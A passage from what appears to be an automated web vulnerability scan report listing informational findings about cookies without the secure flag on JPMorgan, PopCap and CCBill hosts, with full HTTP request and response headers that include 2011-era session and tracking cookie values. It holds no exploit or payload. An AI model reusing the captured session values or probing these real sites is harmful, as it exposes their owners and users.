Last-Modified: Fri, 08 Jul 2011 10:02:36 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:54 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 27973
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

/*
Copyright (c) 2010, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.com/yui/license.html
version: 2.8.1
*/
(function(){var G=YAHOO.util.Dom,M=YAHOO.util
...[SNIP]...

7.87. https://mm.jpmorgan.com/js/yui/connection-min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/js/yui/connection-min.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/yui/connection-min.js HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:49 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"13048-1310119356000"
Last-Modified: Fri, 08 Jul 2011 10:02:36 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:49 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 13048
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

/*
Copyright (c) 2010, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.com/yui/license.html
version: 2.8.1
*/
YAHOO.util.Connect={_msxml_progid:["Microsoft
...[SNIP]...

7.88. https://mm.jpmorgan.com/js/yui/container-min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/js/yui/container-min.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/yui/container-min.js HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:55 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"74941-1310119356000"
Last-Modified: Fri, 08 Jul 2011 10:02:36 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:55 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 74941
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

/*
Copyright (c) 2010, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.com/yui/license.html
version: 2.8.1
*/
(function(){YAHOO.util.Config=function(D){if(
...[SNIP]...

7.89. https://mm.jpmorgan.com/js/yui/element-min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/js/yui/element-min.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/yui/element-min.js HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:49 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"9242-1310119356000"
Last-Modified: Fri, 08 Jul 2011 10:02:36 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:49 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 9242
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

/*
Copyright (c) 2009, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.net/yui/license.txt
version: 2.8.0r4
*/
YAHOO.util.Attribute=function(B,A){if(A){thi
...[SNIP]...

7.90. https://mm.jpmorgan.com/js/yui/event-delegate-min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/js/yui/event-delegate-min.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/yui/event-delegate-min.js HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:49 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"1506-1310119356000"
Last-Modified: Fri, 08 Jul 2011 10:02:36 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:49 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 1506
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

/*
Copyright (c) 2010, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.com/yui/license.html
version: 2.8.1
*/
(function(){var A=YAHOO.util.Event,C=YA
...[SNIP]...

7.91. https://mm.jpmorgan.com/js/yui/selector-min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/js/yui/selector-min.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/yui/selector-min.js HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:49 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"7809-1310119356000"
Last-Modified: Fri, 08 Jul 2011 10:02:36 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:49 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 7809
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

/*
Copyright (c) 2010, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.com/yui/license.html
version: 2.8.1
*/
(function(){var A=YAHOO.util;A.Selector
...[SNIP]...

7.92. https://mm.jpmorgan.com/js/yui/tabview-min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/js/yui/tabview-min.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/yui/tabview-min.js HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:54 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"9929-1310119356000"
Last-Modified: Fri, 08 Jul 2011 10:02:36 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:54 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 9929
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

/*
Copyright (c) 2009, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.net/yui/license.txt
version: 2.8.0r4
*/
(function(){var B=YAHOO.util,C=B.Dom,H=B.Eve
...[SNIP]...

7.93. https://mm.jpmorgan.com/js/yui/treeview-min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/js/yui/treeview-min.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/yui/treeview-min.js HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:54 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"34319-1310119356000"
Last-Modified: Fri, 08 Jul 2011 10:02:36 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:54 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 34319
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

/*
Copyright (c) 2010, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.com/yui/license.html
version: 2.8.1
*/
(function(){var D=YAHOO.util.Dom,B=YAHO
...[SNIP]...

7.94. https://mm.jpmorgan.com/js/yui/yahoo-dom-event.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/js/yui/yahoo-dom-event.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/yui/yahoo-dom-event.js HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:49 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"37005-1310119356000"
Last-Modified: Fri, 08 Jul 2011 10:02:36 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:49 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 37005
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

/*
Copyright (c) 2009, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.net/yui/license.txt
version: 2.8.0r4
*/
if(typeof YAHOO=="undefined"||!YAHOO){
...[SNIP]...

7.95. https://store.popcap.com/payment.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://store.popcap.com
Path:	/payment.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

nickname=deleted; expires=Mon, 12-Jul-2010 20:48:31 GMT; path=/; domain=.popcap.com
user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:32 GMT; path=/; domain=.popcap.com
user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:32 GMT; path=/; domain=.popcap.com
user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:32 GMT; path=/; domain=.popcap.com
user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:32 GMT; path=/; domain=.popcap.com
user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:32 GMT; path=/; domain=.popcap.com
user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:32 GMT; path=/; domain=.popcap.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /payment.php HTTP/1.1
Host: store.popcap.com
Connection: keep-alive
Referer: https://store.popcap.com/cart.php?a=track_a&oid=11464&installtag=&icid=bwbundle_HP_PLARGE_pc_EN
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user_id=461b1f76-758a-4ffe-87df-c12b77a2c13c; lcid=1033; geo_location=US; demographics=000000000000000; cookie_version=5; s_vnum=1312174800889%26vn%3D1; s_fv=flash%2010; __utma=163442877.1858697665.1310503156.1310503156.1310503156.1; __utmc=163442877; __utmz=163442877.1310503156.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-1840915809-1310503155904; s_vi=[CS]v1|270E587F051D3BC7-60000103000EBB3F[CE]; PHPSESSID=82rvc45ec9c02afcbeu2lourh7; __utmb=163442877; lv=1310503702; user_profile=003000000000000; s_cc=true; s_invisit=true; s_sq=popcapcom%3D%2526pid%253DCommerce%252520%25253E%252520Cart%2526pidt%253D1%2526oid%253Dhttps%25253A//store.popcap.com/payment.php%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 20:48:32 GMT
Server: Apache
Set-Cookie: nickname=deleted; expires=Mon, 12-Jul-2010 20:48:31 GMT; path=/; domain=.popcap.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:32 GMT; path=/; domain=.popcap.com
Set-Cookie: user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:32 GMT; path=/; domain=.popcap.com
Set-Cookie: user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:32 GMT; path=/; domain=.popcap.com
Set-Cookie: user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:32 GMT; path=/; domain=.popcap.com
Set-Cookie: user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:32 GMT; path=/; domain=.popcap.com
Set-Cookie: user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:32 GMT; path=/; domain=.popcap.com
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 49903

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>PopCap Games -
...[SNIP]...

7.96. https://support.ccbill.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://support.ccbill.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: support.ccbill.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.5.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:16 GMT
X-Cnection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7; Path=/
Content-Length: 13895

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>CCBill Credit Ca
...[SNIP]...

7.97. https://support.ccbill.com/js/ga.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://support.ccbill.com
Path:	/js/ga.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/ga.js HTTP/1.1
Host: support.ccbill.com
Connection: keep-alive
Referer: https://support.ccbill.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.5.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:21 GMT
Last-Modified: Thu, 11 Nov 2010 21:01:58 GMT
ETag: "1834f1-6230-494cd48d57d80"
Accept-Ranges: bytes
Content-Length: 25136
X-Cnection: close
Content-Type: application/x-javascript
X-Pad: avoid browser bug
Set-Cookie: TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7; Path=/

(function(){var aa="_gat",ba="_gaq",r=true,v=false,w=undefined,ca=document,da="4.7.2",y="length",z="cookie",A="location",ea="_gaUserPrefs",fa="ioo",B="&",C="=",D="__utma=",F="__utmb=",G="__utmc=",ga="
...[SNIP]...

7.98. https://support.ccbill.com/style/css/base.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://support.ccbill.com
Path:	/style/css/base.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/css/base.css HTTP/1.1
Host: support.ccbill.com
Connection: keep-alive
Referer: https://support.ccbill.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
